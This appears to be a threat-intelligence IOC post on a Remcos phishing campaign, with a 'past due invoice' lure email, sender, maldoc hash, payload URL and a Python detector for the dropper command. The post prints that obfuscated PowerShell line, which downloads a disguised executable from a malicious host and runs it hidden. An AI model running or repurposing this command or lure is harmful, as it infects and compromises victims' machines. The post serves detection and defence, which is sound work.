pandazheng

Remcos IOCs

Oct 11th, 2021
Remcos IOCs
https://github.com/executemalware/Malware-IOCs/blob/main/2021-10-11%20Remcos%20IOCs

THREAT IDENTIFICATION: REMCOS

SUBJECTS OBSERVED
PAST DUE INVOICE

SENDERS OBSERVED
sejongkj@daum.net

EMAIL BODY
Good afternoon,

I need to confirm the following

Attached find past due invoice details for your records,

Kind regards,

MALDOC FILE HASHES
PAST DUE INVOICE.xls
092fd1fae341ede766b93f694c4ea0bf

POWERSHELL FROM MALDOC
C:\Users\analyst\Documents>powershell -w hi sleep -Se 31;Start-BitsTransfer -Source htt`p://thepunchlineexpose.com/Manager/AnyDesk.e`xe -Destination C:\Users\Public\Documents\weekshe.e`xe;C:\Users\Public\Documents\weekshe.e`xe
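
A defender-side normaliser and classifier for the command line above, added here as an example (it is not part of the paste or the linked repository): it strips the backtick obfuscation the way PowerShell's own tokenizer would, flags the hidden window, sandbox delay, BITS download, drop into a world-writable folder and the download-then-execute chain, and pulls out the URL and dropped path as IOCs. The indicator names are my own; the sample input is the page's command line with the wrapped lines re-joined.

```python
import re
# Sample input: the command line recorded on this page (wrapped lines re-joined).
MALDOC_CMDLINE = (
    "powershell -w hi sleep -Se 31;Start-BitsTransfer -Source "
    "htt`p://thepunchlineexpose.com/Manager/AnyDesk.e`xe "
    "-Destination C:\\Users\\Public\\Documents\\weekshe.e`xe;"
    "C:\\Users\\Public\\Documents\\weekshe.e`xe"
)
# Characters that form a real PowerShell escape sequence after a backtick;
# any other backtick is silently dropped by the parser, i.e. pure obfuscation.
PS_ESCAPE_CHARS = set("0abefnrtv`\"'$")

def strip_backticks(cmd: str) -> str:
    """Normalise the command line to what PowerShell's tokenizer actually runs."""
    out, i = [], 0
    while i < len(cmd):
        if cmd[i] == "`" and i + 1 < len(cmd) and cmd[i + 1] not in PS_ESCAPE_CHARS:
            i += 1  # drop the backtick, keep the character after it
            continue
        out.append(cmd[i])
        i += 1
    return "".join(out)

# Behaviours present in this sample (indicator names are my own). PowerShell accepts
# unambiguous parameter prefixes, so "-w hi" is -WindowStyle Hidden, "-Se" is -Seconds.
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hi(?:dden)?\b", re.I),
    "sandbox_delay": re.compile(r"\b(?:start-)?sleep\s+-se(?:conds)?\s+\d+", re.I),
    "bits_download": re.compile(r"Start-BitsTransfer\b[^;]*-Source\s+https?://", re.I),
    "drop_to_public": re.compile(r"-Destination\s+C:\\Users\\Public\\", re.I),
}

def analyse(cmd: str) -> dict:
    """Return matched indicators plus the payload URL and dropped path as IOCs."""
    norm = strip_backticks(cmd)
    hits = {name for name, rx in INDICATORS.items() if rx.search(norm)}
    if norm != cmd:
        hits.add("backtick_obfuscation")
    url = re.search(r"-Source\s+(https?://[^\s;]+)", norm, re.I)
    dest = re.search(r"-Destination\s+([^\s;]+)", norm, re.I)
    if dest:
        # download-then-execute: the dropped file is invoked as a later statement
        segments = [s.strip() for s in norm.split(";")]
        idx = next(i for i, s in enumerate(segments) if dest.group(1) in s)
        if any(s.lower() == dest.group(1).lower() for s in segments[idx + 1:]):
            hits.add("download_then_execute")
    return {"hits": sorted(hits),
            "payload_url": url.group(1) if url else None,
            "dropped_path": dest.group(1) if dest else None}
```

Run `analyse()` over process-creation command lines (Sysmon event 1 or 4688); a hit on `backtick_obfuscation` together with `bits_download` and `download_then_execute` is a high-confidence match for this maldoc chain.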

PAYLOAD URL
http://thepunchlineexpose.com/Manager/AnyDesk.exe

REMCOS C2
No C2 traffic observed - the payload URL was 404

SUPPORTING EVIDENCE
https://urlhaus.abuse.ch/browse.php?search=thepunchlineexpose.com